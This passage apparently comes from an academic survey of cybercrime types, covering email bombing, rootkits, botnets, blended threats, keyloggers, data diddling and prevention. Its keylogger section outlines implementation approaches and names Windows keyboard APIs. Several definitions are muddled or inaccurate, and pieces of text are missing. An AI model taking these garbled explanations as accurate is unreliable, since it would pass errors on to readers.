Stalking is a continuous process, consisting of a series of actions, each of which may be entirely legal in itself. It can be considered as a form of mental assault and harassment, in which the attacker repeatedly, unwantedly, and disruptively breaks into the victim‟s machine with whom he does not have relationship with motives that are directly or indirectly traceable to the affective computing environment. It is important to know that cyberstalking is slightly different than cyber trolling as the former deals with an action of persistent and harmful while the later one is mainly perceived as to be harmless. It is interesting to note that cyberstalking if used for scrutinizing a public figure like politicians, business, actors, etc. can be considered lawful.

xv) Web defacement

This crime is caused by an attack on a website over internet with a view to change the visual appearance of the

site or a webpage. The attackers of this crime are able to break into the web server and replace their web site appearance by their own designed web page appearance. It has been seen that religious, government and corporation sites are the primary targets for the attackers to satisfy their religious and political views and beliefs. The defacement, these sites will be forced to shut down for repairs which constitutes loss of profit, value and additional expenses for their recovery.

xvi) Email bombing

This crime is caused by sending a large number of e-mails to the victim‟s email address mail servers of organizations, universities, government agencies or even internet service providers. The mail purpose behind this crime is an attempt to overflow mailbox or overwhelm the mail servers with a view to cause denial-of-service to mail boxes or mail servers. This type of crime can accomplished by three methods: mass mailing, list linking and zip bombing. In mass mailing, duplicate mails are being sent to the same email address and are easy to design and implement. This crime can also generate denial-of-service type of attack, can use malware to attack a clusters of computers, and also spamming for the transmission of emails to email addresses continuously by programming zombie botnets. This form of email bombing is similar in purpose to other Distributed DoS flooding attacks. As the targets are frequently the dedicated hosts handling website and email accounts of a business, this type of attack can be just as devastating to both services of the host. This type of attack is more difficult to defend against than a simple mass-mailing bomb because of the multiple source addresses and the possibility of each zombie computer sending a different message or employing stealth techniques to defeat spam filters. Fortunately, some of these crimes can be controlled by filters and firewalls.

In list linking, a selected or a particular email address is assigned to a number of email list subscriptions. The victim then has to unsubscribe from these unwanted services manually. In order to prevent this type of bombing, most email subscription services send a confirmation email to a person's inbox when that email is used to register for a subscription. This method of prevention adds another new email account that can be set to automatically forward all mails to victim.

The zip bombing is a variant of mail bombing, allows the checking the mails after being filtered by anti-virus software to look for file types that carries malicious message. Such file types include: EXE, RAR, Zip, 7-Zip and many others. These files are usually are compressed. In order to read the contents, these files need to be unzipped or uncompressed and this activity consumes significant amount of processing which may cause denial-of-service type of attack.

xvii) Spyware and Adware

(11)

hand pops-up commercial advertisements related to our work and many other activities.

xviii) Rootkits

This crime is defined as a set of programs that provide privileged access to our computers and will start executing before the operating systems has completed the booting process. In doing so, this program inserts its security privilege to mask the underlying security measures.

xix) Bots and Botnets

A bot program acts like a backdoor Trojan that responds to remote command and control programs. It has effected two popular applications as Internet Relay Chat and multiplayer Internet games and now it is being used to support illegal activities in other applications as well. The computers which are infected by Bots form a network know as botnet. The size of botnet is becoming bigger and bigger and many users are not sure if their computers are part of botnet.

xx) Blended threat

This crime is caused by using server and Internet vulnerabilities to initiate the program, transmit and spread an attack onto computers. This type of crime is more sophisticated than that of viruses, worms, trojan horse and malicious code as it harms to the infected system, networks by getting propagated through different methods, points and exploit vulnerabilities.

This type of attack is designed to use multiple modes of transport where a worm may travel and spread through e-mail, a single blended threat could use multiple routes including e-mail, IRC and file-sharing sharing networks. Sometimes in addition to specific attack on predetermined .exe files, this attack could do multiple malicious acts, like modify your exe files, HTML files and registry keys at the same time and can cause damage within several areas of networks at one time. Blended threats are considered to be the worst risk to security since the inception of viruses, as most blended threats also require no human intervention to propagate.

xxi) Keylogger

This crime is caused by a program that is being used as a covert way where the user is unaware of this program on his/her machine. This program is known as a keylogger or keystroke logging records each key stroke on the keyboard. This type of program finds its use in the study of human computer interaction. Thy keylogger uses different keylogging methods based on hardware and software. Some IT organizations use keyloggers to trouble shoot technical problems with computers and business networks. Some legal use of keyloggers includes family or business people using them to monitor the network usage without their user‟s direct knowledge. However, malicious individuals may use keyloggers on public computers to steal passwords or credit card information.

The keylogger program can be implemented using different approaches and some of the approaches are being discussed below:

V. VARIOUSIMPLEMENTATIONAPPROACHES

OFKEYLOGGERS:

i) In the first approach the keylogger may reside in a malware hypervisor running underneath the operating system that remains untouched and may eventually become virtual machine.

ii) In another approach the program can obtain access to root and hides itself in operating and starts intercepting keystroke that pass through kernel. This type of program resides at kernel level is difficult to detect, especially for user mode applications that do not have root access. These are usually implemented as rootkits that subvert the operating system kernel and gain unauthorized access to hardware, making it more effective. It usually becomes device drivers for them to gain access to keyboard.

iii) Another approach, this program kooks keyboard APIs inside a running application. It registers for keystroke events and receives an event each time any key is either pressed or released and records it. Windows APIs such as GetAsyncKeyState(), GetForegroundWindow(), etc. are used to poll the state of the keyboard or to trigger keyboard events. iv) Another approach is based on the logging web

form submission by recording the web browsing for submitting events. This type of situation may happen when we hit enter key after filling a form which record data before it is passed over the internet.

v) Another approach is based on memory injection concept where keylogger changes the memory tables associated with the browser and other system functions to execute their logging operations. By injecting this into memory, this program can be used by malware users to bypass user account controls.

vi) Another approach is based on the concept of capturing traffic that is associated with HTTP post even to retrieve unencrypted passwords.

vii) Another approach is based on remote access software with added feature that allows access to the locally recorded data from remote location. Remote communication may be achieved via FTP server, e-mail, wireless communication, remote login, etc.

(12)

for second language learning, programming skills, typing skills and many other learning-based programs.

xxii) Internet time theft

This connotes the usage by an unauthorized person of the internet hours paid by another person. One of the most common and difficult to detect forms of the office time theft are employees who use technology for non-work related purposes. This could entail everything from browsing the internet time theft, to spending time on social networking sites and texting during work hours.

This type of crime may be prevented by carefully monitoring the check in, check out time and any breaks of the employees. It may a bit difficult to manage these activities manually but use of time and attendance software not only reduces the time and efforts considerably, but also provides more accurate monitoring of employees. This software may be integrated with different punch clock hardware systems like YubiKeys, swipe cards, biometric devices, etc. This will also help other departments such as payroll, attendance processing, accounting, etc. for exporting work times into payroll software such as QuickBooks, Supply accounting, etc.

xxiii) E-mail fraud

This crime is caused by falling into scam and providing bank details based on the contents of email containing official looking document relating to bank transfer of a huge sum of money from Internal Revenue Service (IRS), lottery, or inheriting account.

xxiv) Web jacking

This crime is caused by hackers who gains access and control the web site of another user and he or she may also change the information of that web site. The reason behind this type of attack may be based on political objectives, or money.

xxv) Data Diddling

This crime is caused due to illegal or unauthorized data alteration of the information and these changes take place before and during data input or before output to a computer system. In other words, person may make mistakes in the information while typing. This type of crime can be committed without any skill and can easily be avoided by introducing the policies and internal control via regular audits or built-in software. Data diddling is the changing of data before or during entry into the computer system. In other words, information is changed from the way it should be entered by a person typing in the data. Usually, a virus that changes data or a programmer of the database or application has pre-programmed it to be changed. Anyone who creates, records, transports, encodes, examines, checks or otherwise has access to data that will enter a computer has an opportunity to change that information to his or her advantage before it enters processing.

Let‟s take an example of someone who filled out data forms for payroll purposes noticed that Over-time claims were entered into the computer by employee number and not name. Accordingly, individual enters the number against the claims of other employees who worked.

Overtime frequently, and received extra income over a period of time.

This is one of the simplest methods of committing a computer-related crime, because it requires almost no computer skills whatsoever. Despite the ease of committing the crime, the cost can be considerable. Another situation may represent this problem where a person entering accounting may change data to show their account, or that or a friend or family member, is paid in full. By changing or failing to enter the information, they are able to steal from the company. To deal with this type of crime, a company must implement policies and internal controls. This may include performing regular audits, using software with built-in features to combat such problems, and supervising employees.

VI. CONSEQUENCES OF CYBER ATTACKS AND CYBER CRIMES

The overall significance and consequences of computer crime sometimes may become too difficult to assess as the statistics available are not reliable because there is a particularly profound unwillingness to report computer-related crime. There may be many reasons for this, but the following four reasons have been considered as widely acceptable to justify the above difficulty:

 To avoid any damage to its reputation and loss of public confidence;

 Lack of tools and infrastructure to conclude the existence of crime;

 To estimate the concern about possible liability for failure to prevent the incident;

 To avoid the user‟s belief that public exposure of the incident would be tantamount to an admission of vulnerability, as well as instruction to others on how to commit the crime.

Cyber Crimes using computers is fully prosecutable under existing substantive law (with perhaps some modification in procedural law, especially in rules of evidence). Other abuse, such as "theft" of information or of computer time, should be left to the civil law so as to prevent stifling innovation. One critic contends that actual computer-assisted crime is much less prevalent than popularly believed, though a certain mystique has unfortunately been attached to the whole area. The attachment of criminal consequences to unauthorized use could have serious effects on the computer industry. In addition, it is said that computer time and efficiency are so valuable that the existing lax industry standards of security should no longer be tolerated.

How to prevent Cybercrime from malicious attack?

Following is a list of preventive measures that we should take to avoid/prevent the occurrence of cyber-crime in our system:

 Ensure that the Operating system is up-to-date. This is essential if we are using Windows operating system